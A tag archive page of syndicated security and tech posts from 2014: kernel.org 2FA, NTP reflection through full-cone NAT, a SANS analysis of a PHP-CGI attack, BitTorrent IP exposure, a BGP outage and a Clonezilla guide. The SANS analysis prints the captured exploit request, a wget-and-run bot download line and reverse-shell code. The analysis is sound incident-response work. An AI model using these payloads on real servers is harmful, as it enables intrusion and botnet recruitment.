Posts tagged ‘ip address’

LWN.net: Linux Kernel Git Repositories Add 2-Factor Authentication (Linux.com)

This post was syndicated from: LWN.net and was written by: ris. Original post: at LWN.net

Linux.com takes
a look
at using 2-factor authentication for commit access to kernel
git repositories. “Having the technology available is one thing, but how to incorporate it into the kernel development process — in a way that doesn’t make developers’ lives painful and unbearable? When we asked them, it became abundantly clear that nobody wanted to type in 6-digit codes every time they needed to do a git remote operation. Where do you draw the line between security and usability in this case?

We looked at the options available in gitolite, the git repository management solution used at kernel.org, and found a way that allowed us to trigger additional checks only when someone performed a write operation, such as “git push.” Since we already knew the username and the remote IP address of the developer attempting to perform a write operation, we put together a verification tool that allowed developers to temporarily whitelist their IP addresses using their 2-factor authentication token.”

SANS Internet Storm Center, InfoCON: green: Part 2: Is your home network unwittingly contributing to NTP DDOS attacks?, (Sun, Aug 17th)

This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

This diary follows from Part 1, published on Sunday August 17, 2014.  

How is it possible that with no port forwarding enabled through the firewall that Internet originated NTP requests were getting past the firewall to the misconfigured NTP server?

The reason why these packets are passing the firewall is because the manufacturer of the gateway router, in this case Pace, implemented full-cone NAT as an alternative to UPnP.

What is full-cone NAT?

The secret is in these settings in the gateway router:

If strict UDP Session Control were enabled the firewall would treat outbound UDP transactions as I described earlier.  When a device on your network initiates an outbound connection to a server responses from that server are permitted back into your network.  Since UDP is stateless most firewalls simulate state with a timeout.  In other words if no traffic is seen between the device and the server for 600 seconds then don’t permit any response from the server until there is new outbound traffic. But anytime related traffic is seen on the correct port the timer is reset to 600 seconds, thus making it possible for this communication to be able to continue virtually forever as long as one or both devices continue to communicate. Visually that looks like:

However if UDP Session Control is disabled, as it is in this device, then this device implements full-cone NAT (RFC 3489). Full-cone NAT allows any external host to use the inbound window opened by the outbound traffic until the timer expires.  

Remember anytime traffic is seen on the correct port the timer is reset to 600 seconds, thus making it possible for this communication to be able to continue virtually forever as long as one or both devices continue to communicate.

The really quick among you will have realized that this is not normally a big problem since the only port exposed is the original ephemeral source port and it is waiting for a NTP reply.  It is not likely to be used as an NTP reflector.  But the design of the NTP protocol can contribute to this problem.

Symmetric Mode NTP

There is a mode of NTP called symmetric NTP in which, instead of the originating device picking an ephemeral port for the outbound connection,  both the source and the destination ports use 123. The traffic flow would look like:

Symmetric NTP opens up the misconfigured server to be an NTP reflector.  Assuming there is an NTP server running on the originating machine on UDP port 123, if an attacker can find this open NTP port before the timeout window closes they can send in NTP queries which will pass the firewall and will be answered by the NTP server.  If the source IP address is spoofed the replies will not go back to the attacker, but will go to a victim instead. 

Of course UDP is stateless so the source IP can be spoofed and there is no way for the receiver of the NTP request to validate the source IP or source port permitting the attacker to direct the attack against any IP and port on the Internet.  It is exceedingly difficult to trace these attacks back to the source so the misconfigured server behind the full-cone NAT will get the blame. As long as the attacker sends at least one packet every 600 seconds he can hold the session open virtually forever and use this device to wreak havoc on unsuspecting victims. We have seen indications of the attackers holding holding these communications open for months.  

What are the lessons to be learned here:

  • If all ISPs fully implemented anti-spoofing filters then the likelihood of this sort of attack is lowered substantially.  In a nutshell anti-spoofing says that if the traffic is headed into my network and the source IP address is from my network then the source IP must be spoofed, so drop the packet.  It also works in the converse.  If a packet is leaving my network and the source IP address is not an IP address from my network then the source IP address must be spoofed, so drop the packet.
  • It can’t hurt to check your network for NTP servers.  A single nmap command will quickly confirm if any are open on your network. nmap -sU  -A -n -PN -pU:123 –script=ntp-monlist .  If you find one or more perhaps you can contact the vendor for possible resolution.
  • If you own a gateway router that implements full-cone NAT you may want to see if your gateway router implements the equivalent of  the Pace “Strict UDP Session Controlâ€�.  This will prevent an attacker from access misconfigured UDP servers on your network. 

– Rick Wanner – rwanner at isc dot sans dot edu- http://namedeplume.blogspot.com/ – Twitter:namedeplume (Protected)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

SANS Internet Storm Center, InfoCON: green: Web Server Attack Investigation – Installing a Bot and Reverse Shell via a PHP Vulnerability, (Sat, Aug 16th)

This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

With Windows malware getting so much attention nowadays, it’s easy to forget that attackers also target other OS platforms. Let’s take a look at a recent attempt to install an IRC bot written in Perl by exploiting a vulnerability in PHP.

The Initial Probe

The web server received the initial probe from 46.41.128.231, an IP address that at the time was not flagged as malicious on various blacklists:

HEAD / HTTP/1.0

The connection lacked the headers typically present in an HTTP request, which is why the web server’s firewall blocked it with the 403 Forbidden HTTP status code error. However, that response was sufficient for the attacker’s tool to confirm that it located a web server.

The Exploitation Attempt

The offending IP address initiated another connection to the web server approximately 4 hours later. This time, the request was less gentle than the initial probe:

POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1
User-Agent: Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25
Content-Type: application/x-www-form-urlencoded

As shown above, the attacking system attempted to access /cgi-bin/php on the targeted server. The parameter supplied to /cgi-bin/php, when converted from hexadecimal into ASCII, corresponded to this:

-dallow_url_include=on-dsafe_mode=off-dsuhosin.simulation=on-ddisable_functions=""-dopen_basedir=none-dauto_prepend_file=php://input-dcgi.force_redirect=0-dcgi.redirect_status_env=0-n

These parameters, when supplied to a vulnerable version of /cgi-bin/php, are designed to dramatically reduce security of the PHP configuration on the system. We covered a similar pattern in our 2012 diary when describing the CVE-2012-1823 vulnerability in PHP. The fix to that vulnerability was poorly implemented, which resulted in the CVE-2012-2311 vulnerability that affected “PHP before 5.3.13 and 5.4.x before 5.4.3, when configured as a CGI script,” according to MITRE. The ISS advisory noted that,

“PHP could allow a remote attacker to execute arbitrary code on the system, due to an incomplete fix for an error related to parsing PHP CGI configurations. An attacker could exploit this vulnerability to execute arbitrary code on the system.”

SpiderLabs documented a similar exploitation attempt in 2013, where they clarified that “one of the key modifications is to specify ‘auto_prepend_file=php://input‘ which will allow the attacker to send PHP code in the request body.”

The Exploit’s Primary Payload: Downloading a Bot

With the expectation that the initial part of the malicious POST request reconfigured PHP, the body of the request began with the following code:

php system("wget ip-address-redacted/speedtest/.a/hb/phpR05 -O /tmp/.bash_h1s7;perl /tmp/.bash_h1s7;rm -rf /tmp/.bash_h1s7 &"); ?>

If the exploit was successful, code would direct the targeted server to download /.a/hb/phpR05 from the attacker’s server, saving the file as /tmp/.bash_h1s7, then running the file using Perl and then deleting the file. Searching the web for “phpR05″ showed a file with this name being used in various exploitation attempts. One such example was very similar to the incident being described in this diary. (In a strange coincidence, that PHP attack was visible in the data that the server was leaking due to a Heartbleed vulnerability!)

The malicious Perl script was an IRC bot, and was recognized as such by several antivirus tools according to VirusTotal. Here’s a tiny excerpt from its code:

#####################
# Stealth Shellbot  #
#####################

sub getnick {
  return "Rizee|RYN|05|".int(rand(8999)+1000);
}

This bot was very similar to the one described by James Espinosa in 2013 in an article discussing Perl/ShellBot.B trojan activity, which began with attempts to exploit a phpMyAdmin file inclusion vulnerability.

The Exploit’s Secondary Payload: Reverse Shell

In addition to supplying instructions to download the IRC bot, the malicious POST request contained PHP code that implemented a reverse backdoor, directing the targeted web server to establish a connection to the attacker’s server on TCP port 22. That script began like this:

$ip = 'ip-address-redacted';
$port = 22;
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'unset HISTFILE; unset HISTSIZE; uname -a; w; id; /bin/sh -i';

Though the attacker specified port 22, the reverse shell didn’t use SSH. Instead, it expected the attacker’s server to listen on that port using a simple tool such as Netcat. Experimenting with this script and Netcat in a lab environment confirmed this, as shown in the following screenshot:

In this laboratory experiment, ‘nc -l -p 22‘ directed Netcat to listen for connections on TCP port 22. Once the reverse shell script ran on the system that mimicked the compromised server, the simulated attacker had the ability to run commands on that server (e.g., ‘whoami‘).

Interestingly, the production server’s logs showed that the system in the wild was listening on TCP port 22; however, it was actually running SSH there, so the reverse shell connection established by the malicious PHP script would have failed.

A bit of web searching revealed a script called ap-unlock-v1337.py, reportedly written in 2012 by “noptrix,” which was designed to exploit the PHP vulnerability outlined above. That script included the exact exploit code used in this incident and included the code that implemented the PHP-based reverse shell. The attacker probably used that script with the goal of installing the Perl-based IRC bot, ignoring the reverse shell feature of the exploit.

Wrap Up

The attack, probably implemented using automated script that probed random IP addresses, was designed to build an IRC-based bot network. It targeted Unix systems that ran a version of PHP susceptible to a 2-year-old vulnerability. This recent incident suggests that there are still plenty of unpatched systems left to compromise. The attacker used an off-the-shelf exploit and an unrelated off-the-shelf bot, both of which were readily available on the Internet. The attacker’s infrastructure included 3 different IP addresses, none of which were blacklisted at the time of the incident.

– Lenny Zeltser

Lenny Zeltser focuses on safeguarding customers’ IT operations at NCR Corp. He also teaches how to analyze malware at SANS Institute. Lenny is active on Twitter and . He also writes a security blog, where he recently described other attacks observed on a web server.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

TorrentFreak: TalkTalk Wants Resellers to Warn Pirating Customers

This post was syndicated from: TorrentFreak and was written by: Ernesto. Original post: at TorrentFreak

talktalklogoUnlike those in the US, Internet providers in the UK are not obliged to forward copyright infringement notices to their subscribers. This means that local Internet users are spared the typical warnings that are so common elsewhere.

Despite the lacking legal requirements, some anti-piracy groups do send copyright infringement notices to UK ISPs. In most cases these are ignored by the providers, but last week TalkTalk forwarded a notice to one of its resellers.

In the email the ISP asks Opal Solutions to forward the notice in question to one of its subscribers who allegedly shared a pirated copy of “Godzilla”. In addition the reseller was urged to take “preventive” measures, but what these should be is left open.

“Please see below copyright infringement email regarding an IP address of one of your clients, Please inform your client and take necessary preventative measures,” TalkTalk wrote.

At the bottom of this article is a copy of the original copyright infringement notice TalkTalk forwarded. It is a typical DMCA style notice sent by IP Echelon on behalf of Warner Bros.

IP Echelon didn’t make any effort to customize the notice for the UK audience. The email specifically references US copyright law, which doesn’t apply to the reseller or TalkTalk.

What’s most noteworthy, though, is that TalkTalk has decided to pass on this notice. The ISP is not known to forward these notices to its own subscribers, yet they appear to be urging a reseller to go beyond what’s required by law.

The forwarded email is most likely an attempt to avoid any type of liability. The question that remains is this: if TalkTalk do this with resellers does this mean they will start warning their subscribers as well?

Earlier this year the news broke that TalkTalk and other UK providers will voluntarily start sending infringement notices under the VCAP program. While VCAP isn’t going into effect before the summer of 2015, TalkTalk’s forwarded infringement notice could suggest that they might do something sooner.

Below is a full copy of the copyright infringement notice.

—-

We are writing this message on behalf of Warner Bros. Entertainment Inc..

We have received information that an individual has utilized the
below-referenced IP address at the noted date and time to offer
downloads of copyrighted material.

The title in question is: Godzilla

The distribution of unauthorized copies of copyrighted television
programs constitutes copyright infringement under the Copyright Act,
Title 17 United States Code Section 106(3). This conduct may also
violate the laws of other countries, international law, and/or treaty
obligations.

Since you own this IP address
we request that you immediately do the following:

1) Contact the subscriber who has engaged in the conduct described
above and take steps to prevent the subscriber from further downloading
or uploading Warner Bros. Entertainment Inc. content without authorization; and

2) Take appropriate action against the account holder under your Abuse
Policy/Terms of Service Agreement.

On behalf of Warner Bros. Entertainment Inc., owner of the exclusive rights
in the copyrighted material at issue in this notice, we hereby state that
we have a good faith belief that use of the material in the manner
complained of is not authorized by Warner Bros. Entertainment Inc.,
its respective agents, or the law.

Also, we hereby state, under penalty of perjury, that we are authorized
to act on behalf of the owner of the exclusive rights being infringed
as set forth in this notification.

We appreciate your assistance and thank you for your cooperation in this
matter. Your prompt response is requested.

Any further enquiries can be directed to copyright@ip-echelon.com
Please include this message with your enquiry to ensure a swift response.

Respectfully,

Adrian Leatherland
CEO
IP-Echelon
Email: copyright@ip-echelon.com
Address: 6715 Hollywood Blvd, Los Angeles, 90028, United States

- ————- Infringement Details ———————————-
Title: Godzilla
Timestamp: 2014-08-13T14:06:26Z
IP Address:
Port: 60261
Type: BitTorrent
Torrent Hash: c5cdf551eea353484657d45dbe93f688575a1e31
Filename: Godzilla.2014.WEBRiP.XviD-VAiN
Filesize: 2485 MB
- ———————————————————————

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

SANS Internet Storm Center, InfoCON: green: Something is amiss with the Interwebs! BGP is a flapping. , (Tue, Aug 12th)

This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

[Update] See http://www.bgpmon.net/what-caused-todays-internet-hiccup/ for a good summary of what happened.

 

Tuesday Morning, various networks experienced outages from 4-6am EDT (8-10am UTC) [1]. I appears the outage was the result of a somewhat anticipated problem with older routers and their inability to deal with the ever increasing size of the Internet’s routing table.

These BGP routers need to store a map of the internet defining which IP address range belongs to which network. Due to the increasing scarcity of IPv4 space, registrars and ISPs assign smaller and smaller netblocks to customers, leading to a more and more fragmented topology. Many older routers are limited to store 512k entries, and the Internet’s routing table has become large enough to reach this limit. Tuesday morning, it appears to have exceeded this limit for a short time [2][3].

The large number of route announcements, and immediate removals shown in [2] could indicate a malicious intend behind this events (or a simple configuration error), but either way likely point to one entity “pushing” the size of the routing table beyond the 512k limit briefly. At around this time, one larger ISP (Windstream, AS7029) recovered from an unrelated outage and routing changes due to the recovery are one suspect that may have triggered the event.

Vendors published guidance for users of older routers how to avoid this issue [5]. This guidance has been available for a while. Please contact your vendor if you are affected. You may also want to consider upgrading your router. The routing table is likely going to get larger over the next few years until networks rely less on IPv4 and take advantage of IPv6.

 

[1] https://puck.nether.net/pipermail/outages/2014-August/007090.html
[2] http://www.cymru.com/BGP/prefix_delta.html (see the spike in deltas around that time)
[3] 
http://www.cidr-report.org/2.0/#General_Status  (note how close it is to 512k and rising)
[4] 
http://www.thewhir.com/web-hosting-news/liquidweb-among-companies-affected-major-outage-across-us-network-providers
[5] http://www.cisco.com/c/en/us/support/docs/switches/catalyst-6500-series-switches/117712-problemsolution-cat6500-00.html
 

Cheers,

Adrien de Beaupré

Intru-shun.ca Inc.

My SANS Teaching Schedule

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

TorrentFreak: BTindex Exposes IP-Addresses of BitTorrent Users

This post was syndicated from: TorrentFreak and was written by: Ernesto. Original post: at TorrentFreak

spyUnless BitTorrent users are taking steps to hide their identities through the use of a VPN, proxy, or seedbox, their downloading habits are available for almost anyone to snoop on.

By design the BitTorrent protocol shares the location of any user in the swarm. After all, without knowing where to send the data nothing can be shared to begin with.

Despite this fairly common knowledge, even some experienced BitTorrent users can be shocked to learn that someone has been monitoring their activities, let alone that their sharing activity is being made public for the rest of the world to see.

Like it or not, this is exactly what the newly launched torrent search engine BTindex is doing.

Unlike most popular torrent sites BTindex adds new content by crawling BitTorrent’s DHT network. This is already quite unique as most other sites get their content from user uploads or other sites. However, the most controversial part without doubt is that the IP-addresses of BitTorrent users are being shared as well.

People who download a file from The Pirate Bay or any other torrent site expose their IP-addresses via the DHT network. BTindex records this information alongside the torrent metadata. The number of peers are displayed in the search results and for each file a selection of IP-addresses is made available to the public.

The image below shows a selection of peers who shared a pirated copy of the movie “Transcendence,” this week’s most downloaded film.

Some IP-addresses sharing “Transcendence.”
btindexips

Perhaps even more worrying to some, the site also gives an overview of all recorded downloads per IP-address. While the database is not exhaustive there is plenty of dirt to be found on heavy BitTorrent users who have DHT enabled in their clients.

Below is an example of the files that were shared via the IP-address of a popular VPN provider.

Files shared by the IP-address of a popular VPN provider
btindexvpnips

Since all data is collected through the DHT network people can avoid being tracked by disabling this feature in their BitTorrent clients. Unfortunately, that only gives a false sense of security as there are plenty of other monitoring firms who track people by gathering IP-addresses directly from the trackers.

The idea to index and expose IP-addresses of public BitTorrent users is not entirely new. In 2011 YouHaveDownloaded did something similar. This site generated considerable interest but was shut down a few months after its launch.

If anything, these sites should act as a wake up call to people who regularly share files via BitTorrent without countermeasures. Depending on the type of files being shared, a mention on BTindex is probably the least of their worries.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

Linux How-Tos and Linux Tutorials: How to Image and Clone Hard Drives with Clonezilla

This post was syndicated from: Linux How-Tos and Linux Tutorials and was written by: Carla Schroder. Original post: at Linux How-Tos and Linux Tutorials

fig-1 gparted

Clonezilla is a partition and disk cloning application for Linux, Free-, Net-, and OpenBSD, Mac OS X, Windows, and Minix. It supports all the major filesystems including EXT, NTFS, FAT, XFS, JFS, and Btrfs, LVM2, and VMWare’s enterprise clustering filesystems VMFS3 and VMFS5. Clonezilla supports 32- and 64-bit systems, both legacy and UEFI BIOS, and both MBR and GPT partition tables. It’s a good tool for backing up a complete Windows system with all of your installed applications, and I like it for making copies of Linux test systems so that I can trash them with mad experiments and then quickly restore them.

Clonezilla can also copy unsupported filesystems with the dd command, which copies blocks rather than files, so it doesn’t need to understand filesystems. So, the short story is Clonezilla can copy anything. (A quick note on blocks: disk sectors are the smallest addressable storage units on hard disks, and blocks are logical data structures made up of single or multiple sectors.)

Clonezilla comes in two versions: Clonezilla Live and Clonezilla Server Edition (SE). Clonezilla live is ace for cloning single computers to a local storage device or network share. Clonezilla SE is for larger deployments, and fast multicast cloning an entire network of PCs at once. Clonezilla SE is a wonderful bit of software that we shall cover in the future. Today we shall create a Clonezilla Live USB stick, clone something, and restore it.

Clonezilla and Tuxboot

When you visit the download page you’ll see Stable and Alternative Stable releases. There are also Testing releases, which I recommend if you’re interested in helping to improve Clonezilla. Stable is based on Debian and includes no non-Free software. Alternative Stable is based on Ubuntu, includes some non-Free firmwares, and it supports UEFI Secure Boot.

After you download Clonezilla, install Tuxboot to copy Clonezilla to a USB stick. Tuxboot is a modification of Unetbootin that supports Clonezilla; you can’t use Unetbootin because it won’t work. Installing Tuxboot is a bit of pain, though Ubuntu users can install Tuxboot the easy way from a personal packages archive (PPA):

$ sudo apt-add-repository ppa:thomas.tsai/ubuntu-tuxboot
$ sudo apt-get update
$ sudo apt-get install tuxboot

If you’re not running Ubuntu and your Linux distribution doesn’t include a packaged version of Tuxboot, download the source tarball and follow the instructions in the README.txt file to compile and install it.

Once you get Tuxboot installed, use it to create your nice live bootable Clonezilla USB stick. First create a FAT32 partition of at least 200 megabytes; figure 1 (above) shows how it’s done in GParted. I like to use labels, like “clonezilla”, so I know what it is. This example shows a 2GB stick formatted as a single partition.

Then fire up Tuxboot (figure 2). Check “Pre-downloaded” and click the button with the ellipsis to select your Clonezilla file. It should find your USB stick automatically, and you should check the partition number to make sure it found the right one. In my example that is /dev/sdd1. Click OK, and when it’s finished click Exit. It asks you if you want to reboot now, but don’t worry because it won’t. Now you have a nice portable Clonezilla USB stick you can use almost anywhere.

fig-2-tuxboot

Creating a Drive Image

Boot up your Clonezilla USB stick on the computer that you want to backup, and the first thing you’ll see is a normal-looking boot menu. Boot to the default entry. You’ll be asked language and keyboard questions, and when you arrive at the Start Clonezilla menu select Start Clonezilla. In the next menu select device_image, then go to the next screen.

This screen is a little confusing, with options for local_dev, ssh_server, samba_server, and nfs_server. This is where you select the location for your backup image to be copied to. If you choose local_dev, then you’ll need a local partition with enough room to store your image. An attached USB hard drive is a nice fast and easy option. If you choose any of the server options you’ll need a wired Ethernet connection, the IP address of your server, and your login. I’ll use a local partition, which means selecting local_dev.

When you select local_dev Clonezilla scans all of your locally-attached storage, including hard disks and USB storage devices, and makes a list of your partitions. Select the one you want to store your new image in, and then it asks which directory to use and shows you a list. Select your desired directory, and the next screen shows all of your mounts and used/available space. Press Enter, and the next screen gives you the option of Beginner or Expert mode. I choose Beginner.

In the next screen you can choose savedisk, which creates an image of an entire hard disk, or save_parts, which allows you to select individual partitions. I want to select partitions.

The next screen asks for a name for your new image. After accepting the default or entering your own name, go to the next screen. Clonezilla scans your partitions and creates a checklist so you can pick the ones you want to copy. After making your selections, the next screen gives you the option to do a filesystem check and repair. I’m impatient, so I skip this part.

The next screen asks if you want Clonezilla to check your newly-created image to make sure it is restorable. I always say yes. Next, it gives you a command-line hint in case you ever want to use the command-line instead of the GUI, and you must press Enter again. You get one more confirmation, and then type y for Yes to make the copy.

You get to watch a nice red, white, and blue progress screen while Clonezilla creates your new image (figure 3).

fig-3 export

When it’s all finished press Enter and then select reboot, and remember to remove your Clonezilla USB stick. Boot up your computer normally, and go look at your nice new Clonezilla image. You should see something like this:

$ ls -l /2014-08-07-11-img/
total 1241448
-rw-r--r-- 1 root root       1223 Aug  7 04:22 blkdev.list
-rw-r--r-- 1 root root        636 Aug  7 04:22 blkid.list
-rw-r--r-- 1 root root       3658 Aug  7 04:24 clonezilla-img
-rw-r--r-- 1 root root      12379 Aug  7 04:24 Info-dmi.txt
-rw-r--r-- 1 root root      22685 Aug  7 04:24 Info-lshw.txt
-rw-r--r-- 1 root root       3652 Aug  7 04:24 Info-lspci.txt
-rw-r--r-- 1 root root        171 Aug  7 04:24 Info-packages.txt
-rw-r--r-- 1 root root         86 Aug  7 04:24 Info-saved-by-cmd.txt
-rw-r--r-- 1 root root          5 Aug  7 04:24 parts
-rw------- 1 root root 1270096769 Aug  7 04:24 sda6.ext4-ptcl-img.gz.aa
-rw-r--r-- 1 root root         37 Aug  7 04:22 sda-chs.sf
-rw-r--r-- 1 root root    1048064 Aug  7 04:22 sda-hidden-data-after-mbr
-rw-r--r-- 1 root root        512 Aug  7 04:22 sda-mbr
-rw-r--r-- 1 root root        750 Aug  7 04:22 sda-pt.parted
-rw-r--r-- 1 root root        625 Aug  7 04:22 sda-pt.parted.compact
-rw-r--r-- 1 root root        514 Aug  7 04:22 sda-pt.sf

Restoring a Clonezilla Image

Restoring your image is similar to creating it. Again, boot up Clonezilla, go through the same initial steps, select dev_image, and then on the local_dev screen select the location of your image that you want to restore, whether it’s on a local device or network share. Then continue through the rest of the screens, making sure that you have the correct restore image and target locations selected.

You can learn more of Clonezilla’s amazing powers at the Clonezilla Live Documentation page.